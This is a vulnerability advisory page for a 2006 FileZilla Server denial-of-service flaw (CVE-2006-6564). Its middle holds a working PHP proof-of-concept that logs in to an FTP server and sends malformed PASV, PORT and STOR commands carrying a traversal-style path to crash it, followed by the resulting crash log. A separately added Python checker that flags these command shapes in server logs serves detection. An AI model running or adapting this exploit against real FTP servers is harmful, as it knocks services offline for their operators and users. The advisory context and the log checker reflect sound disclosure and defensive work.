FileZilla Server STOR command malformed argument denial-of-service vulnerability

Vulnerability ID: 1111749    Vulnerability type: Unknown
Published: 2006-12-09    Updated: 2006-12-15
CVE ID: CVE-2006-6564    CNNVD ID: CNNVD-200612-345
Platform: Windows    CVSS score: 4.0
|Vulnerability sources
https://www.exploit-db.com/exploits/2901
https://www.securityfocus.com/bid/87275
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-345
|Vulnerability details
FileZilla Server before 0.9.22 allows remote attackers to cause a denial of service (crash) via a malformed argument to the STOR command, which triggers a NULL pointer dereference.
|Vulnerability EXP
<?php

# Filezilla FTP Server 0.9.20 beta / 0.9.21 "STOR" Denial Of Service
# by rgod
# mail: retrog at alice dot it
# site: http://retrogod.altervista.org

# tested on WinXP sp2

error_reporting(E_ALL);

# Target: the FTP control port (21) on the test host
$service_port = getservbyname('ftp', 'tcp');
$address = gethostbyname('192.168.1.3');

# Any valid account will do; the crash happens after login
$user="test";
$pass="test";

# Malformed path argument (the original assigned to an undefined variable with .=)
$junk="../../../sun-tzu/../../../sun-tzu/../../../sun-tzu";

# socket_create()/socket_connect() return false on failure, not a negative number
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket === false) {
   echo "socket_create() failed:\n reason: " . socket_strerror(socket_last_error()) . "\n";
   exit(1);
} else {
   echo "OK.\n";
}

$result = socket_connect($socket, $address, $service_port);
if ($result === false) {
   echo "socket_connect() failed:\n reason: " . socket_strerror(socket_last_error($socket)) . "\n";
   exit(1);
} else {
   echo "OK.\n";
}

# Server banner
$out=socket_read($socket, 240);
echo $out;

# Log in
$in = "USER ".$user."\r\n";
socket_write($socket, $in, strlen ($in));

$out=socket_read($socket, 80);
echo $out;

$in = "PASS ".$pass."\r\n";
socket_write($socket, $in, strlen ($in));

$out=socket_read($socket, 80);
echo $out;

# PASV takes no argument and PORT expects h1,h2,h3,h4,p1,p2; both get the junk path
$in = "PASV ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));

$in = "PORT ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));

# STOR with the malformed path: the server crashes on a NULL write (see log below)
$in = "STOR ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));

socket_close($socket);

/*
07:04:28.270  pid=0F84 tid=03A0  EXCEPTION (first-chance)
              ----------------------------------------------------------------
              Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
              ----------------------------------------------------------------
              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
              ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
              ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
              EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
                            --> MOV BYTE PTR [ESI+7C],01
              ----------------------------------------------------------------

07:04:28.330  pid=0F84 tid=03A0  EXCEPTION (unhandled)
              ----------------------------------------------------------------
              Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
              ----------------------------------------------------------------
              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
              ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
              ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
              EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
                            --> MOV BYTE PTR [ESI+7C],01
              ----------------------------------------------------------------

07:04:28.330  pid=0F84 tid=0104  Thread exited with code 3221225477
07:04:28.380  pid=0F84 tid=0F18  Thread exited with code 3221225477
07:04:28.380  pid=0F84 tid=03A0  Thread exited with code 3221225477
07:04:28.380  pid=0F84 tid=04E4  Thread exited with code 3221225477
07:04:28.390  pid=0F84 tid=053C  Thread exited with code 3221225477
07:04:28.390  pid=0F84 tid=0780  Process exited with code 3221225477

*/

?>

# milw0rm.com [2006-12-09]
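Added example, not part of the advisory or of the PoC above: a small log checker that flags the command shapes the PoC sends (PASV with an argument, PORT with a non-numeric argument, STOR with a traversal path) in FileZilla-Server-style session log lines. The log line format, the sample session and the 256-byte path limit are assumptions constructed for this example.

```python
import re

# Assumed log-line shape (constructed, FileZilla-Server-like): "(id) date time - user (ip)> CMD [arg]"
LOG_RE = re.compile(
    r"^\(\d+\)\s+\S+\s+\S+\s+-\s+(?P<user>\S+)\s+\((?P<ip>[^)]+)\)>\s+"
    r"(?P<cmd>[A-Z]{3,4})(?:\s+(?P<arg>.*))?$")
PORT_RE = re.compile(r"^\d{1,3}(,\d{1,3}){5}$")   # RFC 959 PORT h1,h2,h3,h4,p1,p2
MAX_PATH = 256                                     # assumed per-deployment path limit
PATH_CMDS = ("STOR", "STOU", "APPE", "RETR")

def check_command(cmd, arg):
    """Return the reasons one command looks malformed (empty list if it is normal)."""
    arg = arg or ""
    reasons = []
    if cmd == "PASV" and arg:
        reasons.append("PASV takes no argument")
    if cmd == "PORT" and not PORT_RE.match(arg):
        reasons.append("PORT argument is not h1,h2,h3,h4,p1,p2")
    if cmd in PATH_CMDS:
        if "../" in arg or "..\\" in arg:
            reasons.append("traversal sequence in %s path" % cmd)
        if len(arg) > MAX_PATH:
            reasons.append("%s path longer than %d bytes" % (cmd, MAX_PATH))
    return reasons

def scan_log(lines):
    """Return (client_ip, command, reasons) for every flagged line, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue                     # not a command line; skip it
        reasons = check_command(m.group("cmd"), m.group("arg"))
        if reasons:
            findings.append((m.group("ip"), m.group("cmd"), reasons))
    return findings

# Constructed sample: client 1 replays the PoC's command sequence, client 2 is a normal upload
JUNK = "../../../sun-tzu/../../../sun-tzu/../../../sun-tzu"
SAMPLE_LOG = [
    "(000004) 12/09/2006 07:04:27 - test (192.168.1.5)> USER test",
    "(000004) 12/09/2006 07:04:27 - test (192.168.1.5)> PASS ****",
    "(000004) 12/09/2006 07:04:28 - test (192.168.1.5)> PASV " + JUNK,
    "(000004) 12/09/2006 07:04:28 - test (192.168.1.5)> PORT " + JUNK,
    "(000004) 12/09/2006 07:04:28 - test (192.168.1.5)> STOR " + JUNK,
    "(000005) 12/09/2006 07:05:00 - alice (10.0.0.7)> PORT 10,0,0,7,19,137",
    "(000005) 12/09/2006 07:05:01 - alice (10.0.0.7)> STOR report.txt",
]
```

scan_log(SAMPLE_LOG) flags the three PoC lines (PASV, PORT, STOR) from 192.168.1.5 and nothing from the second client.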
|Affected products
FileZilla FileZilla 0.9.21
|References

Source: VUPEN
Name: ADV-2006-4937
Link: http://www.frsirt.com/english/advisories/2006/4937
Source: XF
Name: filezilla-commands-dos(30853)
Link: http://xforce.iss.net/xforce/xfdb/30853
Source: sourceforge.net
Link: http://sourceforge.net/project/shownotes.php?release_id=470364&group_id=21558
Source: MISC
Link: http://retrogod.altervista.org/filezilla_0921_dos.html